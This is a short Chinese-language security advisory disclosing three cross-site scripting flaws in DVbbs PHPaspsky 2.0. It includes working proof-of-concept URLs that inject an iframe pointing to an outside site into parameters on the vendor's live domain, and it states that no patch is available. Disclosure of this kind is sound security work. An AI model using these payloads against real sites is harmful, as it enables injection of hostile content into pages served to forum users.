动网论坛(DVbbs) PHPaspsky 2.0最新多处跨站漏洞

影响版本:
PHPaspsky 2.0

漏洞描述:
动网论坛做为目前国内最大的社区论坛软件服务提供商，依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优 质的客户服务、国内领先的 技术和强大而持续的产品研发并保持不断创新的能力，动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上。

目标网站对用户提交的变量代码未进行有效的过滤或转换，允许攻击者插入恶意WEB代码。

此版本[5-20]新存在三处跨站漏洞

<*参考
http://www.syue.com/man/110.html
*>
测试方法:

http://p.dvbbs.net/indivgroup_list.php?keyword=%22%3E%3Ciframe%20src=http://www.syue.com%3E

http://p.dvbbs.net/infolist.php?t=toplist&orders=7%22%3E%3Ciframe%20src=http://www.syue.com%3E

http://p.dvbbs.net/announcements.php?action=showone&boardid=0%22%3E%3Ciframe%20src=http://www.syue.com%3E

安全建议:
厂商补丁：
动网论坛(dvbbs)
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.dvbbs.net